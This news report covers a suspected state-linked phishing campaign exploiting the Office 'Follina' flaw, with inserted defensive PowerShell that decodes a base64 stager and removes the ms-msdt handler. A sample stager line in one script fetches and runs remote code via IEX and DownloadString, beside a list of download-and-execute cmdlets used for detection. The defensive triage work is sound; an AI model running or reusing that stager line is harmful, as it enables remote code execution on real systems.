A suspected state-linked threat actor has been blamed for a new set of attacks that use the Microsoft Office “Follina” vulnerability to target government agencies in Europe and the United States.
Enterprise security firm Proofpoint says it blocked attempts to exploit the remote code execution flaw, tracked as CVE-2022-30190 (CVSS score: 7.8). Fewer than 1,000 phishing messages were sent to the targets, each carrying a lure document.
“The campaign was disguised as a pay rise and used an RTF with an exploit payload downloaded from 45.76.53[.]253,” the company said in a series of tweets.
The payload, a base64-encoded PowerShell script, acts as a downloader that retrieves a second PowerShell script from a remote server named “Vendor-Notification[.]live”.
“This script checks for virtualization, steals data from local browsers, mail clients and file services, performs machine reconnaissance and then zips it for exfiltration to 45.77.156[.]179,” the company added.
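The first stage described above is a base64-encoded PowerShell downloader. The following is an added example, not code from Proofpoint or from this article, of how a responder triages such a blob: decode it (detecting whether it was encoded as UTF-16LE, which is what PowerShell's -EncodedCommand expects, or as UTF-8) and pull out the download-and-execute cmdlets and network indicators that should go on a block list. The sample stager is constructed for illustration and points at an RFC 5737 documentation address, not at the infrastructure named in the article.

```powershell
# Added example (not Proofpoint's or the article's code): decode a base64-encoded
# PowerShell stager and extract the indicators a responder would want to block.

function ConvertFrom-EncodedPowerShell {
    param([Parameter(Mandatory)][string]$Base64)

    $bytes = [Convert]::FromBase64String($Base64)

    # -EncodedCommand payloads are UTF-16LE, so every second byte of ASCII text is 0x00.
    # Other loaders base64 UTF-8 text instead; detect the encoding rather than assume it.
    $zeroOddBytes = 0
    for ($i = 1; $i -lt $bytes.Length; $i += 2) { if ($bytes[$i] -eq 0) { $zeroOddBytes++ } }
    $looksUtf16 = ($bytes.Length -ge 2) -and ($zeroOddBytes -gt ($bytes.Length / 4))

    if ($looksUtf16) { [Text.Encoding]::Unicode.GetString($bytes) }
    else             { [Text.Encoding]::UTF8.GetString($bytes) }
}

function Get-StagerIndicators {
    param([Parameter(Mandatory)][string]$Script)

    # URLs and bare IPv4 addresses referenced by the decoded script
    $urls = [regex]::Matches($Script, 'https?://[^\s''"`)]+') | ForEach-Object Value
    $ips  = [regex]::Matches($Script, '\b(?:\d{1,3}\.){3}\d{1,3}\b') | ForEach-Object Value

    # Cmdlets, aliases and .NET calls that mark a download-and-execute stager
    $suspicious = @('Invoke-WebRequest', 'iwr', 'Invoke-RestMethod', 'irm', 'DownloadString',
                    'DownloadFile', 'Invoke-Expression', 'iex', 'FromBase64String',
                    '-EncodedCommand', '-enc ', 'Net.WebClient')
    $hits = $suspicious | Where-Object { $Script -match [regex]::Escape($_) }

    $uniqueUrls = @($urls | Sort-Object -Unique)
    [pscustomobject]@{
        Urls       = $uniqueUrls
        IPv4       = @($ips | Sort-Object -Unique)
        Indicators = @($hits)
        # Defanged copies safe to paste into a ticket or report
        Defanged   = @($uniqueUrls | ForEach-Object { ($_ -replace '\.', '[.]') -replace '^http', 'hxxp' })
    }
}

# Constructed sample: a typical one-line stager, encoded the way -EncodedCommand expects.
$stage1  = 'IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.7/stage2.ps1")'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stage1))

$decoded = ConvertFrom-EncodedPowerShell -Base64 $encoded
$decoded
Get-StagerIndicators -Script $decoded | Format-List
```

Decode offline and never execute the recovered script; the second stage it fetches is the one that does the reconnaissance and exfiltration, so the URL and IP in the first stage are the indicators worth blocking at the proxy and firewall.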
Proofpoint did not tie the phishing campaign to any previously known group, but said it was mounted by a nation-state actor, judging by the specificity of the targeting and the broad reconnaissance capabilities of the PowerShell payload.
The development follows active exploitation attempts by a Chinese threat actor tracked as TA413, which delivered weaponized ZIP archives containing malware-rigged Microsoft Word documents.
The Follina vulnerability, which abuses the “ms-msdt:” protocol URI scheme to take remote control of a target device, remains unpatched, prompting Microsoft to advise customers to disable the protocol to close off the attack vector.
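Microsoft's published workaround removes the ms-msdt: URL protocol handler from the registry after backing it up. The following is an added example, not Microsoft's own text or the article's, that applies that workaround with the checks a practitioner would want: confirm the handler is present, export it before deleting, verify the deletion, and keep a restore path for when a patch lands. The backup location is an assumption; any writable path works. Run it from an elevated PowerShell prompt.

```powershell
# Added example (not Microsoft's text): apply, verify and undo the Follina workaround
# that removes the ms-msdt: URL protocol handler. Requires an elevated prompt.

$BackupPath = 'C:\Temp\ms-msdt.reg'   # assumption: any writable path will do

function Test-MsdtHandlerPresent {
    # HKCR\ms-msdt carries the "URL Protocol" value that lets ms-msdt: links launch msdt.exe
    Test-Path 'Registry::HKEY_CLASSES_ROOT\ms-msdt'
}

function Disable-MsdtUrlProtocol {
    param([string]$Backup = $BackupPath)
    if (-not (Test-MsdtHandlerPresent)) { Write-Host 'ms-msdt handler already absent'; return }

    New-Item -ItemType Directory -Path (Split-Path $Backup) -Force | Out-Null

    # Export before deleting so the handler can be restored once the flaw is patched.
    reg.exe export HKEY_CLASSES_ROOT\ms-msdt $Backup /y | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "registry export failed (exit $LASTEXITCODE); not deleting" }

    reg.exe delete HKEY_CLASSES_ROOT\ms-msdt /f | Out-Null
    if (Test-MsdtHandlerPresent) { throw 'ms-msdt key still present after delete' }
    Write-Host "ms-msdt handler removed; backup at $Backup"
}

function Restore-MsdtUrlProtocol {
    param([string]$Backup = $BackupPath)
    if (-not (Test-Path $Backup)) { throw "no backup found at $Backup" }
    reg.exe import $Backup | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "registry import failed (exit $LASTEXITCODE)" }
    Write-Host 'ms-msdt handler restored'
}

# Report exposure before and after applying the workaround.
"Handler present before: $(Test-MsdtHandlerPresent)"
Disable-MsdtUrlProtocol
"Handler present after:  $(Test-MsdtHandlerPresent)"
```

Deleting the key only breaks the ms-msdt: URI path that the exploit relies on; it does not remove msdt.exe itself, and Windows troubleshooters launched through Get Help keep working. Once a fix is installed, run Restore-MsdtUrlProtocol to put the handler back.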
Sherrod DeGrippo, vice president of threat research at Proofpoint, said in a statement shared with The Hacker News:
“The extensive reconnaissance performed by the second PowerShell script shows an actor interested in a large variety of software on a target computer. This, combined with the tight targeting of European government and US local government, makes us suspect that the campaign has a state nexus.”